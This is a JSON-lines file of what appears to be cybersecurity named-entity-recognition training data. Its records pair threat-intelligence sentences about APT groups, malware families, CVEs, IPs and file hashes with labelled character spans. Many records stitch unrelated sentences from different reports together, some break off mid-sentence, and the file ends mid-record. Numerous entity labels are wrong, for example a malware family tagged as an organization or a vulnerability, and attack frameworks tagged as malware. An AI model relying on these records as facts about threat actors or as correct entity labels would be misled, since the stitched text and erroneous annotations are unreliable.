{"text": "On the 12th of February 2013 , FireEye published a blogpost alerting readers to a combination of new Adobe Reader 0-day vulnerabilities , CVE-2013-0640 and CVE-2013-0641 , that were being actively exploited in the wild . 8 days after FireEye ’s initial alert , Kaspersky spotted the same exploit being used to spread an entirely different malware family from the one mentioned in the original report .", "spans": {"ORGANIZATION: FireEye": [[31, 38], [234, 241]], "TOOL: Adobe Reader": [[101, 113]], "VULNERABILITY: 0-day": [[114, 119]], "VULNERABILITY: CVE-2013-0640": [[138, 151]], "VULNERABILITY: CVE-2013-0641": [[156, 169]], "ORGANIZATION: Kaspersky": [[261, 270]]}, "info": {"id": "cyberner_stix_train_000728", "source": "cyberner_stix_train"}}
{"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . \" With our latest research we now see how Greenbug has shifted aACT from HTTP-based C2 communication with Ismdoor .", "spans": {"THREAT_ACTOR: BRONZE BUTLER": [[0, 13]], "TOOL: Daserf malware": [[96, 110]], "VULNERABILITY: Flash exploits": [[136, 150]], "TOOL: C2": [[253, 255]], "MALWARE: Ismdoor": [[275, 282]]}, "info": {"id": "cyberner_stix_train_000729", "source": "cyberner_stix_train"}}
{"text": "The unused command above appears to be related to previous attacks , specifically attacks that occurred in November 2017 as discussed by McAfee and ESET .", "spans": {"ORGANIZATION: McAfee": [[137, 143]], "ORGANIZATION: ESET": [[148, 152]]}, "info": {"id": "cyberner_stix_train_000730", "source": "cyberner_stix_train"}}
{"text": "The most affected countries were India , Brazil , and Indonesia . SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire . TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . It decodes the binary and writes it to a Java temporary directory with name “ ntuser.bin ” .", "spans": {"ORGANIZATION: SPEAR": [[66, 71]], "TOOL: PassCV samples": [[90, 104]], "TOOL: RAT": [[165, 168]], "TOOL: Netwire": [[176, 183]], "THREAT_ACTOR: TG-0416": [[186, 193]]}, "info": {"id": "cyberner_stix_train_000731", "source": "cyberner_stix_train"}}
{"text": "Initial phase During this phase , the Trojan tries to gain root rights on the device and to install some modules . Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . Some Brazilian criminals tout credit card data extracted from a hotel ’s system as high quality and reliable because it was extracted from a trusted source , i.e. , a hotel administration system . Using this remote , the student was able to capture and replay legitimate tram signals .", "spans": {"THREAT_ACTOR: Brazilian criminals": [[392, 411]]}, "info": {"id": "cyberner_stix_train_000732", "source": "cyberner_stix_train"}}
{"text": "The two components are dropped from the following URLs respectively :", "spans": {}, "info": {"id": "cyberner_stix_train_000733", "source": "cyberner_stix_train"}}
{"text": "WCry uses a combination of the RSA and AES algorithms to encrypt files . We believed that the actors would use this date code to track their attack campaigns ; however , after continued analysis of the malware , we think these static dates could also be a build identifier for the Trojan .", "spans": {"TOOL: WCry": [[0, 4]], "TOOL: RSA": [[31, 34]], "TOOL: AES": [[39, 42]], "MALWARE: date code": [[116, 125]], "MALWARE: Trojan": [[281, 287]]}, "info": {"id": "cyberner_stix_train_000734", "source": "cyberner_stix_train"}}
{"text": "TG-3390 : 74.63.195.236 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 74.63.195.236": [[10, 23]]}, "info": {"id": "cyberner_stix_train_000735", "source": "cyberner_stix_train"}}
{"text": "The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran .", "spans": {"THREAT_ACTOR: PassCV group": [[4, 16]], "TOOL: publicly available RATs": [[36, 59]]}, "info": {"id": "cyberner_stix_train_000737", "source": "cyberner_stix_train"}}
{"text": "The domain ‘ addroider [ . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money . We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations .", "spans": {"THREAT_ACTOR: Lazarus Group": [[31, 44]], "ORGANIZATION: economic": [[299, 307]]}, "info": {"id": "cyberner_stix_train_000738", "source": "cyberner_stix_train"}}
{"text": "This practice can be enforced by unchecking the \" Unknown Sources '' option under the \" Security '' settings of your device . In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank . In the previous campaign , the Iranian group sent specially crafted Excel and Word files , which contained macros that targeted individuals were convinced to enable . However , over time , it becomes tedious for fraudsters to constantly change information when registering new domains .", "spans": {"THREAT_ACTOR: admin@338": [[146, 155]], "ORGANIZATION: government": [[230, 240]], "ORGANIZATION: think tank": [[283, 293]], "TOOL: Excel": [[364, 369]], "TOOL: Word": [[374, 378]], "THREAT_ACTOR: fraudsters": [[508, 518]]}, "info": {"id": "cyberner_stix_train_000739", "source": "cyberner_stix_train"}}
{"text": "195.22.126.82 195.22.126.83 SHA256 : 158c7688877853ffedb572ccaa8aa9eff47fa379338151f486e46d8983ce1b67 3aedbe7057130cf359b9b57fa533c2b85bab9612c34697585497734530e7457d f3ae6762df3f2c56b3fe598a9e3ff96ddf878c553be95bacbd192bd14debd637 df61a75b7cfa128d4912e5cb648cfc504a8e7b25f6c83ed19194905fef8624c8 In addition , BRONZE UNION activity on multiple U.S.-based defense manufacturer networks included the threat actors seeking information associated with aerospace technologies , combat processes , and naval defense systems . A multi-layered connected network defense and complete visibility into all network traffic , in addition to next-generation intrusion prevention system ( NGIPS ) , can help organizations stay a step ahead of threats that could compromise intangible assets . It is foreseeable that an organization such as the Earth Liberation Front ELF may attempt an attack to make a political or social statement while the same organization could be targeted by an adversarial nation state in an attempt to steal intellectual property .", "spans": {"ORGANIZATION: U.S.-based defense": [[345, 363]], "ORGANIZATION: aerospace technologies": [[449, 471]], "ORGANIZATION: combat processes": [[474, 490]], "ORGANIZATION: naval defense systems": [[497, 518]], "TOOL: next-generation intrusion prevention system": [[629, 672]], "TOOL: NGIPS": [[675, 680]], "ORGANIZATION: the Earth Liberation Front ELF": [[826, 856]], "THREAT_ACTOR: adversarial nation state": [[971, 995]]}, "info": {"id": "cyberner_stix_train_000740", "source": "cyberner_stix_train"}}
{"text": "One of the most interesting and active specimens to date was a mobile Trojan from the Rotexy family . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality .", "spans": {"MALWARE: Rotexy": [[86, 92]], "TOOL: LOWBALL malware": [[111, 126]], "THREAT_ACTOR: admin@338": [[167, 176]], "MALWARE: upload.bat": [[203, 213]], "ORGANIZATION: US-CERT Code Analysis Team": [[333, 359]], "FILEPATH: botnet controller": [[369, 386]]}, "info": {"id": "cyberner_stix_train_000741", "source": "cyberner_stix_train"}}
{"text": "In fact , the applications are designed to download the autorun.inf file , an icon file and the win32-Trojan file , which the mobile malicious program locates in the root directory of an SD card . Execute a command through exploits for CVE-2017-11882 . Having a campaign ID related to the target is quite common in the case of ShadowPad and Winnti . The image will still display in viewers but the downloader will extract the executable content using the appropriate decryption key and the decryption algorithm .", "spans": {"SYSTEM: win32-Trojan": [[96, 108]], "SYSTEM: SD card": [[187, 194]], "VULNERABILITY: CVE-2017-11882": [[236, 250]], "MALWARE: ShadowPad": [[327, 336]], "MALWARE: Winnti": [[341, 347]]}, "info": {"id": "cyberner_stix_train_000742", "source": "cyberner_stix_train"}}
{"text": "Coralco Tech is an organization located in Cyprus and providing interception tools . Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk . The Base64 blob is of particular interest . The HyperText Transfer Protocol ( HTTP ) redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the header .", "spans": {"ORGANIZATION: Coralco Tech": [[0, 12]], "TOOL: Trojan": [[263, 269]], "TOOL: Lurk": [[277, 281]], "SYSTEM: The HyperText Transfer Protocol ( HTTP )": [[328, 368]]}, "info": {"id": "cyberner_stix_train_000743", "source": "cyberner_stix_train"}}
{"text": "Another common step taken by threat actors is changing their system's MAC Address to avoid being uniquely identified . This was the case in two known intrusions in 2015 , where attackers named the implant DLL \" ASPNET_FILTER.DLL \" to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": {"THREAT_ACTOR: actors": [[36, 42]], "TOOL: DLL": [[205, 208], [253, 256]], "FILEPATH: ASPNET_FILTER.DLL": [[211, 228]], "FILEPATH: ASP.NET ISAPI Filter": [[265, 285]]}, "info": {"id": "cyberner_stix_train_000744", "source": "cyberner_stix_train"}}
{"text": "NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[0, 9]], "VULNERABILITY: CVE-2016-4117": [[35, 48]], "THREAT_ACTOR: PROMETHIUM": [[67, 77]], "ORGANIZATION: Kazuar": [[147, 153]]}, "info": {"id": "cyberner_stix_train_000745", "source": "cyberner_stix_train"}}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "ORGANIZATION: consumer": [[76, 84]], "TOOL: Carberp": [[176, 183]], "ORGANIZATION: Kaspersky Lab": [[186, 199]], "TOOL: flash": [[282, 287]], "VULNERABILITY: exploit": [[288, 295]], "VULNERABILITY: CVE-2015-5119": [[298, 311]]}, "info": {"id": "cyberner_stix_train_000746", "source": "cyberner_stix_train"}}
{"text": "Together , during the latter half of 2018 , we worked to remove the apps from the Play store while it was being deployed in the wild . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US .", "spans": {"SYSTEM: Play store": [[82, 92]], "VULNERABILITY: CVE-2018-4878": [[174, 187]], "THREAT_ACTOR: attacker": [[200, 208]], "THREAT_ACTOR: MuddyWater": [[283, 293]]}, "info": {"id": "cyberner_stix_train_000747", "source": "cyberner_stix_train"}}
{"text": "This is odd because attackers almost never set up an actual webpage on adversary C2 infrastructure .", "spans": {"TOOL: C2": [[81, 83]]}, "info": {"id": "cyberner_stix_train_000748", "source": "cyberner_stix_train"}}
{"text": "Moreover , there are many toolkits like the SpyNote Trojan builder that enable users to build malware with ease and few clicks . The hackers will map a company’s network and look for strategically favorable locations for placing their malware . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent .", "spans": {"MALWARE: SpyNote": [[44, 51]], "THREAT_ACTOR: hackers": [[133, 140]], "THREAT_ACTOR: CopyKittens": [[276, 287]], "MALWARE: Metasploit": [[292, 302]], "VULNERABILITY: exploit": [[378, 385]], "MALWARE: Mimikatz": [[425, 433]], "MALWARE: Empire": [[500, 506]], "MALWARE: PowerShell": [[511, 521]], "TOOL: Python": [[526, 532]]}, "info": {"id": "cyberner_stix_train_000749", "source": "cyberner_stix_train"}}
{"text": "They mentioned an Android , iOS and Windows remote access tool ( RAT ) . When we first encountered Lurk , in 2011 , it was a nameless Trojan . Opening the .PDF file drops and executes a malware in a victim ’s system . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": {"SYSTEM: Android": [[18, 25]], "SYSTEM: iOS": [[28, 31]], "SYSTEM: Windows": [[36, 43]], "TOOL: Lurk": [[99, 103]], "FILEPATH: .PDF": [[155, 159]], "MALWARE: SocGholish": [[238, 248]]}, "info": {"id": "cyberner_stix_train_000750", "source": "cyberner_stix_train"}}
{"text": "Russia , like many nations , has long viewed success in the Olympic Games as a source of national prestige and soft power on the world stage .", "spans": {}, "info": {"id": "cyberner_stix_train_000751", "source": "cyberner_stix_train"}}
{"text": "A brief timeline of this activity is shown in Figure 1.Figure 1: Timeline of this recently observed spear phishing campaign . FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL’s Kalignite multivendor ATM platform .", "spans": {"ORGANIZATION: FireEye": [[126, 133]], "FILEPATH: Ploutus": [[194, 201]], "FILEPATH: Ploutus-D": [[211, 220]]}, "info": {"id": "cyberner_stix_train_000752", "source": "cyberner_stix_train"}}
{"text": "] com or hxxp : //apple-icloud [ . Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 . After the initial checks described above, Glimpse creates a hidden file that contains an agent ID, which is a simple concatenation of a random number 10-99 and the first 8 characters of a GUID without . Apropos of my retrospective report , Bullock found that a great many messages in Biderman ’s inbox were belligerent and anti - Semitic screeds from a former Ashley Madison employee named William Brewster Harrison .", "spans": {"THREAT_ACTOR: PLA Unit 61398": [[84, 98], [118, 132]], "THREAT_ACTOR: APT1": [[136, 140]], "MALWARE: Glimpse": [[185, 192]], "TOOL: GUID": [[331, 335]], "ORGANIZATION: Bullock": [[383, 390]], "ORGANIZATION: Ashley Madison employee": [[503, 526]], "ORGANIZATION: William Brewster Harrison": [[533, 558]]}, "info": {"id": "cyberner_stix_train_000753", "source": "cyberner_stix_train"}}
{"text": "One of the most impressive features of this malware is its resilience . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world . OceanLotus : ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f Loader #2 . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": {"THREAT_ACTOR: APT10": [[72, 77]], "TOOL: MSP networks": [[176, 188]], "ORGANIZATION: customers": [[210, 219]], "THREAT_ACTOR: OceanLotus": [[270, 280]], "FILEPATH: ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f": [[283, 347]]}, "info": {"id": "cyberner_stix_train_000754", "source": "cyberner_stix_train"}}
{"text": "On the other hand , it ’ s extremely easy for the crooks to re-direct communications to another freshly created account , ” explains Štefanko . Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped .", "spans": {"THREAT_ACTOR: Scattered Canary": [[239, 255]], "THREAT_ACTOR: Lazarus": [[361, 368]], "ORGANIZATION: Sony Pictures Entertainment": [[466, 493]]}, "info": {"id": "cyberner_stix_train_000755", "source": "cyberner_stix_train"}}
{"text": "One of the more prolific actors that we track - referred to as TA505 - is responsible for the largest malicious spam campaigns we have ever observed , distributing instances of the Dridex banking Trojan , Locky ransomware , Jaff ransomware , The Trick banking Trojan , and several others in very high volumes .", "spans": {"THREAT_ACTOR: TA505": [[63, 68]], "MALWARE: Dridex": [[181, 187]], "MALWARE: Trojan": [[196, 202], [260, 266]], "MALWARE: Locky": [[205, 210]], "MALWARE: Jaff": [[224, 228]], "MALWARE: Trick": [[246, 251]]}, "info": {"id": "cyberner_stix_train_000756", "source": "cyberner_stix_train"}}
{"text": "The attackers may have also downloaded and installed additional tools to penetrate the network further .", "spans": {}, "info": {"id": "cyberner_stix_train_000757", "source": "cyberner_stix_train"}}
{"text": "In the analysis that follows , we describe in detail the capabilities of this new variant and a “ kill switch ” that can remotely eliminate the malware from a mobile device . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": {"THREAT_ACTOR: Emissary Panda": [[393, 407]], "FILEPATH: Seminar-Invitation.doc": [[458, 480]], "TOOL: Microsoft Word": [[504, 518]], "MALWARE: ThreeDollars": [[540, 552]]}, "info": {"id": "cyberner_stix_train_000758", "source": "cyberner_stix_train"}}
{"text": "to eSurv S.R.L . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro ) , an Iran-nexus actor that has been active since at least May 2017 .", "spans": {"ORGANIZATION: eSurv S.R.L .": [[3, 16]], "MALWARE: Microsoft Word documents": [[81, 105]], "VULNERABILITY: CVE-2017-0199": [[117, 130]], "THREAT_ACTOR: TEMP.Zagros": [[163, 174]], "ORGANIZATION: Palo Alto Networks": [[189, 207]], "ORGANIZATION: Trend Micro": [[212, 223]], "THREAT_ACTOR: actor": [[242, 247]]}, "info": {"id": "cyberner_stix_train_000759", "source": "cyberner_stix_train"}}
{"text": "Based on the timeline , it appears that the actors were actively developing several of the loaders at the same time from 2009 until the early months of 2014 . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"THREAT_ACTOR: actors": [[44, 50]], "THREAT_ACTOR: Lotus Blossom": [[183, 196]], "ORGANIZATION: individual": [[231, 241]]}, "info": {"id": "cyberner_stix_train_000760", "source": "cyberner_stix_train"}}
{"text": "Since May 2017 , Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": {"ORGANIZATION: Mandiant": [[17, 25]], "TOOL: emails": [[176, 182]], "ORGANIZATION: government officials": [[197, 217]], "FILEPATH: malicious Microsoft Word document": [[259, 292]], "VULNERABILITY: CVE-2012-0158": [[312, 325]]}, "info": {"id": "cyberner_stix_train_000761", "source": "cyberner_stix_train"}}
{"text": "THE DUKES 7 YEARS OF RUSSIAN CYBERESPIONAGE .", "spans": {"THREAT_ACTOR: DUKES": [[4, 9]]}, "info": {"id": "cyberner_stix_train_000762", "source": "cyberner_stix_train"}}
{"text": "APK SHA256 Size ( bytes ) First Seen App Package name App name 0589bed1e3b3d6234c30061be3be1cc6685d786ab3a892a8d4dae8e2d7ed92f7 2,740,860 May 2016 com.android.henbox DroidVPN Table 1 Details of the HenBox DroidVPN app on the uyghurapps [ . Hackers usually take precautions , which experts refer to as Opsec . A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity .", "spans": {"SYSTEM: DroidVPN": [[166, 174], [205, 213]], "MALWARE: HenBox": [[198, 204]], "THREAT_ACTOR: Hackers": [[240, 247]], "ORGANIZATION: FireEye": [[350, 357]], "THREAT_ACTOR: admin@338": [[460, 469]]}, "info": {"id": "cyberner_stix_train_000763", "source": "cyberner_stix_train"}}
{"text": "The document was not the only one discovered in the recent attack waves .", "spans": {}, "info": {"id": "cyberner_stix_train_000764", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //mailsa-wqu [ . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . Performing entropy calculations on subdomain labels can help highlight the amount of randomness in a label, but this is just one of many possible data analysis points, since a standalone feature may not be enough to determine whether traffic is . More information TunnelVision has been observed exploiting Fortinet FortiOS CVE201813379 , Microsoft Exchange ProxyShell and the recent Log4Shell vulnerabilities .", "spans": {"THREAT_ACTOR: APT28": [[34, 39]], "ORGANIZATION: military": [[189, 197]], "ORGANIZATION: government": [[202, 212]], "VULNERABILITY: FortiOS CVE201813379": [[566, 586]], "VULNERABILITY: Microsoft Exchange ProxyShell": [[589, 618]], "VULNERABILITY: Log4Shell": [[634, 643]]}, "info": {"id": "cyberner_stix_train_000765", "source": "cyberner_stix_train"}}
{"text": "In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[14, 27]], "ORGANIZATION: minority groups": [[83, 98]], "ORGANIZATION: supporters": [[116, 126]], "THREAT_ACTOR: group": [[179, 184]], "ORGANIZATION: anti-terrorist organizations": [[236, 264]], "MALWARE: Carbanak": [[267, 275]], "ORGANIZATION: consumer": [[343, 351]], "MALWARE: Carberp": [[443, 450]]}, "info": {"id": "cyberner_stix_train_000766", "source": "cyberner_stix_train"}}
{"text": "Attackers can point and click their way through a compromised network and exfiltrate data . The ultimate objective of targeted attacks is to acquire sensitive data .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "cyberner_stix_train_000767", "source": "cyberner_stix_train"}}
{"text": "According to slide 22 , \" CSEC assesses , with moderate certainty , SNOWGLOBE to be a state-sponsored Cyber Network Operation effort , put forth by a French intelligence agency \" . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware .", "spans": {"FILEPATH: malicious documents": [[210, 229]], "VULNERABILITY: CVE-2017-0199": [[241, 254]], "MALWARE: LATENTBOT": [[280, 289]], "MALWARE: malware": [[290, 297]]}, "info": {"id": "cyberner_stix_train_000768", "source": "cyberner_stix_train"}}
{"text": "They also relied on Nbtscan , net user , and ping commands to obtain insights and identify opportunities for lateral movement .", "spans": {}, "info": {"id": "cyberner_stix_train_000769", "source": "cyberner_stix_train"}}
{"text": "JULY 2015 , APT28 used two domains ( nato-news.com and bbc-news.org ) to host an Adobe Flash zero-day exploit to target NATO , the Afghan Ministry of Foreign Affairs , and the Pakistani military .", "spans": {"THREAT_ACTOR: APT28": [[12, 17]], "DOMAIN: nato-news.com": [[37, 50]], "DOMAIN: bbc-news.org": [[55, 67]], "ORGANIZATION: Adobe": [[81, 86]], "TOOL: Flash": [[87, 92]], "VULNERABILITY: zero-day": [[93, 101]], "ORGANIZATION: NATO": [[120, 124]], "ORGANIZATION: Afghan Ministry of Foreign Affairs": [[131, 165]], "ORGANIZATION: Pakistani military": [[176, 194]]}, "info": {"id": "cyberner_stix_train_000770", "source": "cyberner_stix_train"}}
{"text": "Follow the instructions at the bottom of this page . We assess with high confidence that Sea Turtle was targeted in an attempt to re-establish access to the NetNod network , which was previously compromised by this threat actor . PROMETHIUM is an activity group that has been active since at least 2012 .", "spans": {"ORGANIZATION: NetNod": [[157, 163]], "THREAT_ACTOR: threat actor": [[215, 227]], "THREAT_ACTOR: PROMETHIUM": [[230, 240]]}, "info": {"id": "cyberner_stix_train_000771", "source": "cyberner_stix_train"}}
{"text": "This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . In 2016 , the threat actors conducted a strategic web compromise ( SWC ) on the website of an international industry organization that affected aerospace , academic , media , technology , government , and utilities organizations around the world .", "spans": {"ORGANIZATION: chemical sector": [[36, 51]], "ORGANIZATION: international industry organization": [[264, 299]], "ORGANIZATION: aerospace": [[314, 323]], "ORGANIZATION: academic": [[326, 334]], "ORGANIZATION: media": [[337, 342]], "ORGANIZATION: technology": [[345, 355]], "ORGANIZATION: government": [[358, 368]], "ORGANIZATION: utilities organizations": [[375, 398]]}, "info": {"id": "cyberner_stix_train_000772", "source": "cyberner_stix_train"}}
{"text": "We have identified no collaboration between the two actors , or even an awareness of one by the other .", "spans": {}, "info": {"id": "cyberner_stix_train_000773", "source": "cyberner_stix_train"}}
{"text": "ALLMSG – send C & C all SMSs received and sent by user , as stored in phone memory . Symantec detects this threat as Backdoor.Nidiran . Our investigation of Leafminer started with the discovery of JavaScript code on several compromised websites in the Middle East .", "spans": {"ORGANIZATION: Symantec": [[85, 93]], "MALWARE: Backdoor.Nidiran": [[117, 133]], "THREAT_ACTOR: Leafminer": [[157, 166]], "MALWARE: JavaScript code": [[197, 212]], "MALWARE: compromised websites": [[224, 244]]}, "info": {"id": "cyberner_stix_train_000774", "source": "cyberner_stix_train"}}
{"text": "Finally , a new Windows service is created with the service path pointing to the candidate .exe located in this new directory together with the freshly created , benign-looking DLL . The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . Executes the payload by overwriting the return address on the stack . The dropper first creates a shortcut file but the dropped DLL is launched with rundll32.exe instead of regsvr32.exe .", "spans": {"SYSTEM: Windows": [[16, 23]], "THREAT_ACTOR: group": [[187, 192]], "ORGANIZATION: social media": [[213, 225]], "TOOL: RATs": [[372, 376]], "TOOL: PupyRAT": [[385, 392]]}, "info": {"id": "cyberner_stix_train_000775", "source": "cyberner_stix_train"}}
{"text": "The launcher page picks one of two Flash files to deliver depending upon the target ’s platform ( Windows 32 versus 64bits ) .", "spans": {"TOOL: Flash": [[35, 40]], "SYSTEM: Windows 32": [[98, 108]]}, "info": {"id": "cyberner_stix_train_000776", "source": "cyberner_stix_train"}}
{"text": "All the the payloads observed by Cybereason in this campaign were packed by a powerful yet commercial packer called Enigma Packer .", "spans": {"ORGANIZATION: Cybereason": [[33, 43]], "TOOL: Enigma": [[116, 122]]}, "info": {"id": "cyberner_stix_train_000777", "source": "cyberner_stix_train"}}
{"text": "The PlugX malware can be configured to use HTTP , DNS , raw TCP , or UDP to avoid network-based detection .", "spans": {"MALWARE: PlugX": [[4, 9]]}, "info": {"id": "cyberner_stix_train_000778", "source": "cyberner_stix_train"}}
{"text": "The dropper is a repacked legitimate application which contains an additional piece of code – “ loader ” . Threat actors have targeted the government of Thailand and delivered the newly discovered Bookworm Trojan since July 2015 . The early stages of a Dexphot infection involves numerous files and processes . Proxy : Multi - hop Proxy A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 ( RDP ) , 139 ( Netbios ) , and 445 ( SMB ) enabling full remote access from outside the network and has also used TOR .004", "spans": {"ORGANIZATION: government": [[139, 149]], "TOOL: Bookworm Trojan": [[197, 212]], "MALWARE: Dexphot": [[253, 260]], "MALWARE: Multi - hop Proxy A backdoor": [[319, 347]], "THREAT_ACTOR: APT29": [[356, 361]], "TOOL: TOR": [[565, 568]]}, "info": {"id": "cyberner_stix_train_000779", "source": "cyberner_stix_train"}}
{"text": "Attacks on Windows XP allows mobile malware to infect a PC after connecting a smartphone or tablet . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection . The algorithm used to decrypt the strings is the same as the one used to decrypt the static strings of the module . Who is the Winnti group ?", "spans": {"SYSTEM: Windows XP": [[11, 21]], "MALWARE: Catchamas": [[101, 110]], "THREAT_ACTOR: Winnti group": [[376, 388]]}, "info": {"id": "cyberner_stix_train_000780", "source": "cyberner_stix_train"}}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 — the same date the first authenticated login to Visma’s network was made using stolen credentials .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "THREAT_ACTOR: Insikt Group": [[159, 171]], "TOOL: VPN": [[217, 220], [314, 317]], "FILEPATH: Citrix-hosted": [[270, 283]]}, "info": {"id": "cyberner_stix_train_000781", "source": "cyberner_stix_train"}}
{"text": "Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day .", "spans": {"THREAT_ACTOR: TA459": [[41, 46]]}, "info": {"id": "cyberner_stix_train_000782", "source": "cyberner_stix_train"}}
{"text": "Creation date is a week before the start of the tournament . APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor . Samples in this grouping were all hosted on sites that were called by the second stage . We can compare many successful RDP attacks to the equivalent of leaving a window or back door unlocked at our homes , giving the criminal a low barrier to entry .", "spans": {"THREAT_ACTOR: APT32": [[61, 66]], "TOOL: Cobalt Strike BEACON backdoor": [[135, 164]], "VULNERABILITY: giving the criminal a low barrier to entry": [[374, 416]]}, "info": {"id": "cyberner_stix_train_000783", "source": "cyberner_stix_train"}}
{"text": "Here the list of the files potentially dropped during the installation stage : FILE NAME STAGE DESCRIPTION d3d9.dll Stage 4 Malware loader used for UAC environments with limited privileges ; also protected by VM obfuscation aepic.dll , sspisrv.dll , userenv.dll Stage 4 Malware loader used in presence of administrative privileges ; executed from ( and injected into ) a fake service ; also protected by VM obfuscation msvcr90.dll Stage 5 Malware payload injected into Since at least 2013 , the Iranian threat group FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations . A SimpleKeyringInterface class is used to initialize the key , while the IV is passed to the SetCipherWithIV function . The government even offered a reward of up to $ 10 million for information on Cl0p after several federal agencies in the US fell victim to the gang .", "spans": {"THREAT_ACTOR: threat group": [[503, 515]], "ORGANIZATION: FireEye": [[516, 523]], "THREAT_ACTOR: APT33": [[534, 539]], "ORGANIZATION: defense": [[612, 619]], "ORGANIZATION: aerospace": [[622, 631]], "ORGANIZATION: petrochemical organizations": [[636, 663]], "TOOL: SimpleKeyringInterface": [[668, 690]], "TOOL: SetCipherWithIV": [[759, 774]], "ORGANIZATION: government": [[790, 800]], "THREAT_ACTOR: 